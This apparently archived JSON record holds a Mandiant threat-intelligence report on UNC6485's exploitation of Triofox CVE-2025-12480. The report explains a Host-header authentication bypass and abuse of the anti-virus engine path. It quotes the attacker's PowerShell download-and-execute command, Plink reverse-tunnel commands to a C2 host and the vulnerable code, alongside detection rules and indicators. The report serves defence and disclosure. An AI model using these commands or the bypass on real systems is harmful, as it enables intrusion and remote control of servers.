{
	"id": "17497973-ca74-4376-b8e2-c633878d9fb7",
	"created_at": "2026-04-06T00:09:33.815532Z",
	"updated_at": "2026-04-10T03:36:00.772067Z",
	"deleted_at": null,
	"sha1_hash": "73bcbb22ae3ebff753793f265be0a0e60bf33b67",
	"title": "Unauthenticated Remote Access via Triofox Vulnerability CVE-2025-12480",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 846044,
	"plain_text": "Unauthenticated Remote Access via Triofox Vulnerability CVE-2025-12480\r\nBy Mandiant\r\nPublished: 2025-11-10 · Archived: 2026-04-05 14:42:00 UTC\r\nWritten by: Stallone D'Souza, Praveeth DSouza, Bill Glynn, Kevin O'Flynn, Yash Gupta\r\nWelcome to the Frontline Bulletin Series\r\nStraight from Mandiant Threat Defense, the \"Frontline Bulletin\" series brings you the latest on the threats we are seeing in\r\nthe wild right now, equipping our community to understand and respond. \r\nIntroduction\r\nMandiant Threat Defense has uncovered exploitation of an unauthenticated access vulnerability within Gladinet’s Triofox\r\nfile-sharing and remote access platform. This now-patched n-day vulnerability, assigned CVE-2025-12480, allowed an\r\nattacker to bypass authentication and access the application configuration pages, enabling the upload and execution of\r\narbitrary payloads. \r\nAs early as Aug. 24, 2025, a threat cluster tracked by Google Threat Intelligence Group (GTIG) as UNC6485 exploited the\r\nunauthenticated access vulnerability and chained it with the abuse of the built-in anti-virus feature to achieve code\r\nexecution. \r\nThe activity discussed in this blog post leveraged a vulnerability in Triofox version 16.4.10317.56372, which was mitigated\r\nin release 16.7.10368.56560.\r\nGladinet engaged with Mandiant on our findings, and Mandiant has validated that this vulnerability is resolved in new\r\nversions of Triofox.\r\nInitial Detection\r\nMandiant leverages Google Security Operations (SecOps) for detecting, investigating, and responding to security incidents\r\nacross our customer base. As part of Google Cloud Security’s Shared Fate model, SecOps provides out-of-the-box detection\r\ncontent designed to help customers identify threats to their enterprise. 
Mandiant uses SecOps’ composite detection\r\nfunctionality to enhance our detection posture by correlating the outputs from multiple rules.\r\nFor this investigation, Mandiant received a composite detection alert identifying potential threat actor activity on a\r\ncustomer's Triofox server. The alert identified the deployment and use of remote access utilities (using PLINK to tunnel\r\nRDP externally) and file activity in potential staging directories (file downloads to C:\\WINDOWS\\Temp).\r\nWithin 16 minutes of beginning the investigation, Mandiant confirmed the threat and initiated containment of the host. The\r\ninvestigation revealed an unauthenticated access vulnerability that allowed access to configuration pages. UNC6485 used\r\nthese pages to run the initial Triofox setup process to create a new native admin account, Cluster Admin, and used this\r\naccount to conduct subsequent activities.\r\nTriofox Unauthenticated Access Control Vulnerability\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480\r\nPage 1 of 8\n\nFigure 1: CVE-2025-12480 exploitation chain\r\nDuring the Mandiant investigation, we identified an anomalous entry in the HTTP log file - a suspicious HTTP GET request\r\nwith an HTTP Referer URL containing localhost. 
The presence of the localhost host header in a request originating\r\nfrom an external source is highly irregular and typically not expected in legitimate traffic.\r\nGET /management/CommitPage.aspx - 443 - 85.239.63[.]37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTM\r\nFigure 2: HTTP log entry\r\nWithin a test environment, Mandiant noted that standard HTTP requests issued to AdminAccount.aspx result in a redirect to\r\nthe Access Denied page, indicative of access controls being in place on the page.\r\nFigure 3: Redirection to AccessDenied.aspx when attempting to browse AdminAccount.aspx\r\nAccess to the AdminAccount.aspx page is granted as part of setup from the initial configuration page at\r\nAdminDatabase.aspx. The AdminDatabase.aspx page is automatically launched after first installing the Triofox software.\r\nThis page allows the user to set up the Triofox instance, with options such as database selection (Postgres or MySQL),\r\nconnecting LDAP accounts, or creating a new native cluster admin account, in addition to other details.\r\nAttempts to browse to the AdminDatabase.aspx page resulted in a similar redirect to the Access Denied page.\r\nFigure 4: Redirection to AccessDenied.aspx when attempting to browse AdminDatabase.aspx\r\nMandiant validated the vulnerability by testing the workflow of the setup process. The Host header field is provided by the\r\nweb client and can be easily modified by an attacker. This technique is referred to as an HTTP host header attack. 
Changing\r\nthe Host value to localhost grants access to the AdminDatabase.aspx page.\r\nFigure 5: Access granted to AdminDatabase.aspx by changing Host header to localhost\r\nBy following the setup process and creating a new database via the AdminDatabase.aspx page, access is granted to the\r\nadmin initialization page, AdminAccount.aspx, which then redirects to the InitAccount.aspx page to create a new admin\r\naccount.\r\nFigure 6: Successful access to the AdminCreation page InitAccount.aspx\r\nAnalysis of the code base revealed that the main access control check to the AdminDatabase.aspx page is controlled by the\r\nfunction CanRunCriticalPage(), located within the GladPageUILib.GladBasePage class found in C:\\Program Files\r\n(x86)\\Triofox\\portal\\bin\\GladPageUILib.dll.\r\npublic bool CanRunCriticalPage()\r\n{\r\n Uri url = base.Request.Url;\r\n string host = url.Host;\r\n bool flag = string.Compare(host, \"localhost\", true) == 0; //Access to the page is granted if Request.Url.Host equals '\r\n bool result;\r\n if (flag)\r\n {\r\n result = true;\r\n }\r\n else\r\n {\r\n //Check for a pre-configured trusted IP in the web.config file. 
If configured, compare the client IP with the trust\r\n \r\nstring text = ConfigurationManager.AppSettings[\"TrustedHostIp\"];\r\n bool flag2 = string.IsNullOrEmpty(text);\r\n if (flag2)\r\n {\r\n result = false;\r\n }\r\n else\r\n {\r\n string ipaddress = this.GetIPAddress();\r\n bool flag3 = string.IsNullOrEmpty(ipaddress);\r\n if (flag3)\r\n {\r\n result = false;\r\n }\r\n else\r\n ...\r\n \r\nFigure 8: Vulnerable code in the function CanRunCriticalPage()\r\nAs noted in the code snippet, the code presents several vulnerabilities:\r\nHost Header attack - ASP.NET builds Request.Url from the HTTP Host header, which can be modified by an\r\nattacker.\r\nNo Origin Validation - No check for whether the request came from an actual localhost connection versus a\r\nspoofed header.\r\nConfiguration Dependence - If TrustedHostIp isn't configured, the only protection is the Host header check.\r\nTriofox Anti-Virus Feature Abuse\r\nTo achieve code execution, the attacker logged in using the newly created Admin account. The attacker uploaded malicious\r\nfiles to execute them using the built-in anti-virus feature. To set up the anti-virus feature, the user is allowed to provide an\r\narbitrary path for the selected anti-virus. The file configured as the anti-virus scanner location inherits the Triofox parent\r\nprocess account privileges, running under the context of the SYSTEM account.\r\nThe attacker was able to run their malicious batch script by configuring the path of the anti-virus engine to point to their\r\nscript. 
The folder path on disk of any shared folder is displayed when publishing a new share within the Triofox application.\r\nThen, by uploading an arbitrary file to any published share within the Triofox instance, the configured script will be\r\nexecuted.\r\nFigure 9: Anti-virus engine path set to a malicious batch script\r\nSecOps telemetry recorded the following command-line execution of the attacker script:\r\nC:\\Windows\\system32\\cmd.exe /c \"\"c:\\triofox\\centre_report.bat\" C:\\Windows\\TEMP\\eset_temp\\ESET638946159761752413.av\"\r\nPost-Exploitation Activity\r\nFigure 10: Overview of the post-exploitation activity\r\nSupport Tools Deployment\r\nThe attacker script centre_report.bat executed the following PowerShell command to download and execute a second-stage payload:\r\npowershell -NoProfile -ExecutionPolicy Bypass -Command \"$url = 'http://84.200.80[.]252/SAgentInstaller_16.7.10368.56560.z\r\nThe PowerShell downloader was designed to:\r\nDownload a payload from http://84.200.80[.]252/SAgentInstaller_16.7.10368.56560.zip, which hosted a\r\ndisguised executable despite the ZIP extension\r\nSave the payload to: C:\\Windows\\appcompat\\SAgentInstaller_16.7.10368.56560.exe\r\nExecute the payload silently\r\nThe executed payload was a legitimate copy of the Zoho Unified Endpoint Management System (UEMS) software installer.\r\nThe attacker used the UEMS agent to then deploy the Zoho Assist and AnyDesk remote access utilities on the host.\r\nReconnaissance and Privilege Escalation\r\nThe attacker used Zoho Assist to run various commands to enumerate active SMB sessions and specific local and domain\r\nuser information. 
\r\nAdditionally, they attempted to change passwords for existing accounts and add the accounts to the local administrators and\r\nthe “Domain Admins” group.\r\nDefense Evasion\r\nThe attacker downloaded sihosts.exe and silcon.exe (sourced from the legitimate domain the.earth[.]li) into the\r\ndirectory C:\\windows\\temp\\.\r\nFilename Original Filename Description\r\nsihosts.exe Plink (PuTTY Link) A common command-line utility for creating SSH connections\r\nsilcon.exe PuTTY An SSH and telnet client\r\nThese tools were used to set up an encrypted tunnel, connecting the compromised host to their command-and-control (C2 or\r\nC\u0026C) server over port 433 via SSH. The C2 server could then forward all traffic over the tunnel to the compromised host\r\non port 3389, allowing inbound RDP traffic. The commands were run with the following parameters:\r\nC:\\windows\\temp\\sihosts.exe -batch -hostkey \"ssh-rsa 2048 SHA256:\u003cREDACTED\u003e\" -ssh -P 433 -l \u003cREDACTED\u003e -pw \u003cREDACTED\u003e -R\r\nC:\\windows\\temp\\silcon.exe -ssh -P 433 -l \u003cREDACTED\u003e -pw \u003cREDACTED\u003e-R 216.107.136[.]46:17400:127.0.0.1:3389 216.107.136[.\r\nConclusion\r\nWhile this vulnerability is patched in the Triofox version 16.7.10368.56560, Mandiant recommends upgrading to the latest\r\nrelease. In addition, Mandiant recommends auditing admin accounts, and verifying that Triofox’s Anti-virus Engine is not\r\nconfigured to execute unauthorized scripts or binaries. Security teams should also hunt for attacker tools using our hunting\r\nqueries listed at the bottom of this post, and monitor for anomalous outbound SSH traffic. \r\nAcknowledgements\r\nSpecial thanks to Elvis Miezitis, Chris Pickett, Moritz Raabe, Angelo Del Rosario, and Lampros Noutsos\r\nDetection Through Google SecOps\r\nGoogle SecOps customers have access to these broad category rules and more under the Mandiant Windows Threats rule\r\npack. 
The activity discussed in the blog post is detected in Google SecOps under the rule names:\r\nGladinet or Triofox IIS Worker Spawns CMD\r\nGladinet or Triofox Suspicious File or Directory Activity\r\nGladinet Cloudmonitor Launches Suspicious Child Process\r\nPowershell Download and Execute\r\nFile Writes To AppCompat\r\nSuspicious Renamed Anydesk Install\r\nSuspicious Activity In Triofox Directory\r\nSuspicious Execution From Appcompat\r\nRDP Protocol Over SSH Reverse Tunnel Methodology\r\nPlink EXE Tunneler\r\nNet User Domain Enumeration\r\nSecOps Hunting Queries\r\nThe following UDM queries can be used to identify potential compromises within your environment.\r\nGladinetCloudMonitor.exe Spawns Windows Command Shell\r\nIdentify the legitimate GladinetCloudMonitor.exe process spawning a Windows Command Shell.\r\nmetadata.event_type = \"PROCESS_LAUNCH\"\r\nprincipal.process.file.full_path = /GladinetCloudMonitor\\.exe/ nocase\r\ntarget.process.file.full_path = /cmd\\.exe/ nocase\r\nUtility Execution\r\nIdentify the execution of a renamed Plink executable (sihosts.exe) or a renamed PuTTY executable (silcon.exe) attempting to\r\nestablish a reverse SSH tunnel.\r\nmetadata.event_type = \"PROCESS_LAUNCH\"\r\ntarget.process.command_line = /-R\\b/\r\n(\r\ntarget.process.file.full_path = /(silcon\\.exe|sihosts\\.exe)/ nocase or\r\n(target.process.file.sha256 = \"50479953865b30775056441b10fdcb984126ba4f98af4f64756902a807b453e7\" and target.process.file.f\r\n(target.process.file.sha256 = \"16cbe40fb24ce2d422afddb5a90a5801ced32ef52c22c2fc77b25a90837f28ad\" and target.process.file.f\r\n)\r\nArtifact Description SHA-256 Hash\r\nC:\\Windows\\appcompat\\SAgentInstaller_16.7.10368.56560.exe Installer containing Zoho UEMS Agent 43c455274d41e58132be7f66139566a941190ceba46082eb2ad7\r\nC:\\Windows\\temp\\sihosts.exe Plink 50479953865b30775056441b10fdcb984126ba4f98af4f647569\r\nC:\\Windows\\temp\\silcon.exe PuTTY 16cbe40fb24ce2d422afddb5a90a5801ced32ef52c22c2fc77b2\r\nC:\\Windows\\temp\\file.exe AnyDesk ac7f226bdf1c6750afa6a03da2b483eee2ef02cd9c2d6af71ea7\r\nC:\\triofox\\centre_report.bat Attacker batch script filename N/A\r\nNetwork-Based Artifacts\r\nIP Address ASN Description\r\n85.239.63[.]37 AS62240 - Clouvider Limited IP address of the attacker used to initially exploit CVE-2025-12480 to create the admin account and gain access to the Triofox instance\r\n65.109.204[.]197 AS24950 - Hetzner Online GmbH After a dormant period, the threat actor used this IP address to log back into the Triofox instance and carry out subsequent activities\r\n84.200.80[.]252 AS214036 - Ultahost, Inc. IP address hosting the installer for the Zoho UEMSAgent remote access tool\r\n216.107.136[.]46 AS396356 - LATITUDE-SH Plink C2\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480"
	],
	"report_names": [
		"triofox-vulnerability-cve-2025-12480"
	],
	"threat_actors": [
		{
			"id": "6755ec1a-7731-4723-b27a-9cd062438f1b",
			"created_at": "2026-01-20T02:00:03.663809Z",
			"updated_at": "2026-04-10T02:00:03.913995Z",
			"deleted_at": null,
			"main_name": "UNC6485",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC6485",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434173,
	"ts_updated_at": 1775792160,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/73bcbb22ae3ebff753793f265be0a0e60bf33b67.pdf",
		"text": "https://archive.orkl.eu/73bcbb22ae3ebff753793f265be0a0e60bf33b67.txt",
		"img": "https://archive.orkl.eu/73bcbb22ae3ebff753793f265be0a0e60bf33b67.jpg"
	}
}